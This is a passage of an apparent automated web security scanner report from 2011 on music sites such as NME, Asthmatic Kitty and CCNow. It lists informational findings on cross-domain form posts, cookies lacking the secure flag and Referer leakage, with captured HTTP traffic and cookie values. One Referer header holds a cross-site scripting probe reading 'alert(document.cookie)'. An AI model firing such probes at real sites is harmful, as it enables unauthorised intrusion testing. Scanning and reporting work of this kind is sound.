Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.106.125
X-Cnection: close
Date: Mon, 09 May 2011 14:04:49 GMT
Content-Length: 18197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u988983_1" class="fbConnectWidgetTopmost" style="height:256px; width:354px; "><div class="mhs pvm phs ConnectActivityLogin hidden_elem uiBoxWhite"><label class="mrm fbLoginButton uiButton uiButtonConfirm uiButtonLarge" for="u988983_2"><input value="Log in" onclick="ConnectSocialWidget.getInstance(&quot;u988983_1&quot;).login();" type="submit" id="u988983_2" /></label><div class="ConnectActivityLoginMessage"></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/nmemagazine" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/188057_9577714166_7953271_q.jpg" alt="NME Magazine" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/nmemagazine" target="_blank"><span class="name">NME Magazine</span> on Facebook</a></div><div><div id="connect_widget_4dc7f481cc6a02046653508" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>NME Magazine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a
...[SNIP]...

Request 2

GET /plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.114.125
X-Cnection: close
Date: Mon, 09 May 2011 14:05:37 GMT
Content-Length: 18150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u993736_1" class="fbConnectWidgetTopmost" style="height:256px; width:354px; "><div class="mhs pvm phs ConnectActivityLogin hidden_elem uiBoxWhite"><label class="mrm fbLoginButton uiButton uiButtonConfirm uiButtonLarge" for="u993736_2"><input value="Log in" onclick="ConnectSocialWidget.getInstance(&quot;u993736_1&quot;).login();" type="submit" id="u993736_2" /></label><div class="ConnectActivityLoginMessage"></div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/nmemagazine" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/188057_9577714166_7953271_q.jpg" alt="NME Magazine" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/nmemagazine" target="_blank"><span class="name">NME Magazine</span> on Facebook</a></div><div><div id="connect_widget_4dc7f4b157f875447287826" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>NME Magazine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a
...[SNIP]...
13. Cross-domain POST  previous  next
There are 4 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

13.1. http://asthmatickitty.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain asthmatickitty.us1.list-manage.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://www.sufjan.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 39321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Asthmatic Kitty Records : Home</title>
<script src="/mint/?js" type="text/javascript"></script>

<script language
...[SNIP]...
<div id="mc_embed_signup" style="width: 230px;">
<form action="http://asthmatickitty.us1.list-manage.com/subscribe/post?u=8b99b26102810d538744c3fa2&amp;id=30df477f26" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" style="font: normal 100% Verdana;font-size: 10px;">
   <fieldset style="-moz-border-radius: 4px;border-radius: 4px;-webkit-border-radius: 4px;border: 0px;padding:0px;margin: 0;background-color: #FFFFFF;color: #333333;text-align: left;">
...[SNIP]...
13.2. http://asthmatickitty.com/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /news.php

Issue detail

The page contains a form which POSTs data to the domain asthmatickitty.us1.list-manage.com. The form contains the following fields:

Request

GET /news.php HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MintAcceptsCookies=1; __utmz=1.1304949953.1.1.utmcsr=sufjan.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.851040495.1304949953.1304949953.1304949953.1; __utmc=1; __utmb=1.1.10.1304949953; MintUnique=1; MintUniqueHour=1304949600; MintUniqueDay=1304917200; MintUniqueWeek=1304830800; MintUniqueMonth=1304226000; MintUniqueLocation=1; MintCrush=-409446192

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 147990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Asthmatic Kitty Records</title>
<script src="/mint/?js" type="text/javascript"></script>
<script language="JavaScr
...[SNIP]...
<div id="mc_embed_signup" style="width: 230px;">
<form action="http://asthmatickitty.us1.list-manage.com/subscribe/post?u=8b99b26102810d538744c3fa2&amp;id=30df477f26" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" style="font: normal 100% Verdana;font-size: 10px;">
   <fieldset style="-moz-border-radius: 4px;border-radius: 4px;-webkit-border-radius: 4px;border: 0px;padding:0px;margin: 0;background-color: #FFFFFF;color: #333333;text-align: left;">
...[SNIP]...
13.3. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nme.com
Path:   /themes/default/static_images//themes/default/images/footer_bkgrd.gif

Issue detail

The page contains a form which POSTs data to the domain ebm.cheetahmail.com. The form contains the following fields:

Request

GET /themes/default/static_images//themes/default/images/footer_bkgrd.gif HTTP/1.1
Host: static.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Wed, 13 Apr 2011 14:52:18 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 3553292c29d61be30dade092df8597046390d4ea"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3640"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014481544494629"]|
X-Wf-1-1-1-10: 23|[{"Type":"LOG"},"ct: "]|
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=345007, post-check=0, pre-check=0
Expires: Fri, 13 May 2011 13:52:24 GMT
Date: Mon, 09 May 2011 14:02:17 GMT
Connection: close
Content-Length: 41093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
</p>
            <form name="form2" method="post" action="http://ebm.cheetahmail.com/r/regf2" onsubmit="return popupform(this, 'join')">
               <p>
...[SNIP]...
13.4. http://www.nme.com/news/sufjan-stevens/56527  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The page contains a form which POSTs data to the domain ebm.cheetahmail.com. The form contains the following fields:

Request

GET /news/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:36 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 56830e3f97674f92659a8a7e54b9b44fea17850e"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3560"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014510154724121"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Set-Cookie: ServerID=1043; path=/
Set-Cookie: PHPSESSID=nb14qm2u5j3cpt8fp8muap0hh1; path=/; domain=.nme.com
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:00:36 GMT; path=/; domain=.nme.com
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:37 GMT; path=/; domain=.nme.com
Content-Length: 62535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/
...[SNIP]...
</p>
   <form onsubmit="return popupform(this, 'join')" action="http://ebm.cheetahmail.com/r/regf2" method="post" name="form2" class="box_fixed_height">
       <input type="hidden" value="1577005779" name="aid" />
...[SNIP]...
14. SSL cookie without secure flag set  previous  next
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

14.1. https://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/ HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:44 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950065; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:45 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75D81F41DED68942DF4467139B51A38206; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:07:45 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
14.2. https://www.ccnow.com/cgi-local/checkout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /cgi-local/checkout.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980
Content-Length: 287

action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Productio
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:52 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950072; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:52 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18997

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
14.3. https://www.ccnow.com/cgi-local/sc_cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /cgi-local/sc_cart.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980
Content-Length: 365

seq1_asmakit_pid=AKR214&seq1_asmakit_quan=1&coupon_asmakit=&shipreg_asmakit=BC%3AUS&action=update&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=ZZ&cids=asmakit
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:50 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950070; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:50 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
15. Cross-domain Referer leakage  previous  next
There are 42 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

15.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /adj/onl.vine/music/blogs

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/onl.vine/music/blogs;kw=;cat=music;cat1=blogs;ctype=articles;skin=default;adtype=panorama;pos=top;tile=3;sz=940x1;ord=100511120035? HTTP/1.1
Host: ad-apac.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 262

document.write('<a target="_blank" href="http://ad-apac.doubleclick.net/6k;h=v8/3b02/0/0/%2a/w;44306;0-0;0;51300835;22475-940/1;0/0/0;;~aopt=2/1/4/2;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
15.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N4714.155049.CLASHMUSIC.COM/B5451784

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N4714.155049.CLASHMUSIC.COM/B5451784;click0=http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=855__zoneid=1__cb=b1615b20a4__oadest=;sz=728x90;ord=b1615b20a4? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee0199fca83b=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 14:07:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 38714

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
2908128%3B3454-728/90%3B41654583/41672370/1%3B%3B%7Esscs%3D%3fhttp://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=855__zoneid=1__cb=b1615b20a4__oadest=http://">
<IMG SRC="http://s0.2mdn.net/1577870/PID_1588095_FP_S11_LEADERBOARD_728x90.gif" width="728" height="90" BORDER="0" alt="">
</A>
...[SNIP]...
15.3. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
